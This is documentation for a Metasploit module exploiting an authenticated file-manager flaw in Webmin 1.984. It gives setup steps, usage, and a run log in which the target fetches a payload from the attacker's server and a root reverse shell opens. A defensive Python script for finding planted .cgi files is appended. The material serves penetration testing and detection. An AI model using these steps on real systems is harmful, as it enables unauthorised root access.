## Vulnerable Application

In Webmin v1.984, any authenticated low-privilege user without access rights to the File Manager module could interact with file manager functionality such as downloading files from remote URLs and changing file permissions (chmod). By chaining those two functions in the file manager, it is possible to achieve remote code execution via a crafted .cgi file.

### Setup, on Ubuntu 20.04

```
wget https://download.webmin.com/devel/deb/webmin_1.984_all.deb
sudo dpkg -i webmin_1.984_all.deb
```

Webmin should now be installed. The credentials for the web UI will be the same as those of the user that installed Webmin.

## Options

### USERNAME

A specific username to authenticate as

### PASSWORD

A specific password to authenticate with

## Verification Steps

1. Start msfconsole
1. Do: `use exploit/linux/http/webmin_file_manager_rce`
1. Set the `RHOST`, `USERNAME`, and `PASSWORD` options
1. Run the module
1. Receive a session as the `root` user.

## Scenarios

### Webmin 1.984, on Ubuntu 20.04

```
msf > exploit/linux/http/webmin_file_manager_rce
[*] Using exploit/linux/http/webmin_file_manager_rce
msf exploit(linux/http/webmin_file_manager_rce) > set password notpassword
password => notpassword
msf exploit(linux/http/webmin_file_manager_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf exploit(linux/http/webmin_file_manager_rce) > set rhosts 172.16.199.132
rhosts => 172.16.199.132
msf exploit(linux/http/webmin_file_manager_rce) > set username msfuser
username => msfuser
msf exploit(linux/http/webmin_file_manager_rce) > run

[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://172.16.199.1:8080/tmBFT82mvsHD
[*] Attempting to authenticate with Webmin
[+] Authentication successful
[*] Downloading remote url
[*] Fetching payload from HTTP server
[*] Request 'GET /tmBFT82mvsHD.cgi'
[*] Sending payload ...
[*] Finished downloading remote url
[*] Modifying the permissions of the uploaded payload to 0755
[+] Deleted /usr/share/webmin/tmBFT82mvsHD.cgi
[*] Command shell session 9 opened (172.16.199.1:4444 -> 172.16.199.132:58058) at 2022-10-25 16:21:02 -0400
[*] Server stopped.

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.15.0-52-generic #58~20.04.1-Ubuntu SMP Thu Oct 13 13:09:46 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
```
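
The run above places a `.cgi` file directly under `/usr/share/webmin` and sets it to 0755, which gives a defender a host-side artifact to audit for. The following is an added example, not part of the module or of Webmin: it lists top-level `.cgi` files that the `webmin` Debian package did not install. The function names, the `--live` switch and the sample file names in `demo()` are constructed for illustration, and the package lookup assumes a dpkg-based install as in the setup section.

```python
import os
import stat
import subprocess
import sys
import tempfile

WEBMIN_ROOT = "/usr/share/webmin"  # directory shown in the scenario output


def packaged_files(package="webmin"):
    """Paths that dpkg recorded for the package (Debian/Ubuntu hosts only)."""
    out = subprocess.run(["dpkg", "-L", package],
                         capture_output=True, text=True, check=True)
    return {line.strip() for line in out.stdout.splitlines() if line.strip()}


def unexpected_cgi(root, manifest):
    """Return (path, mode, executable) for top-level .cgi files not in manifest."""
    findings = []
    for entry in os.scandir(root):
        if not entry.name.endswith(".cgi"):
            continue
        if not entry.is_file(follow_symlinks=False) or entry.path in manifest:
            continue
        mode = entry.stat(follow_symlinks=False).st_mode
        # A file with no execute bit may be a chain interrupted before chmod.
        findings.append((entry.path, oct(stat.S_IMODE(mode)), bool(mode & 0o111)))
    return sorted(findings)


def demo():
    """Constructed tree: one packaged script and two files the package never shipped."""
    samples = (("index.cgi", 0o755), ("aBcD1234.cgi", 0o755), ("notes.cgi", 0o644))
    with tempfile.TemporaryDirectory() as root:
        for name, mode in samples:
            path = os.path.join(root, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        manifest = {os.path.join(root, "index.cgi")}  # stands in for `dpkg -L webmin`
        return [(os.path.basename(p), m, x) for p, m, x in unexpected_cgi(root, manifest)]


if __name__ == "__main__":
    if "--live" in sys.argv:  # audit the real install instead of the sample tree
        for finding in unexpected_cgi(WEBMIN_ROOT, packaged_files()):
            print(finding)
    else:
        print(demo())
```

The module in the scenario deleted its file once the session opened, so an empty result only shows that no such file remains on disk.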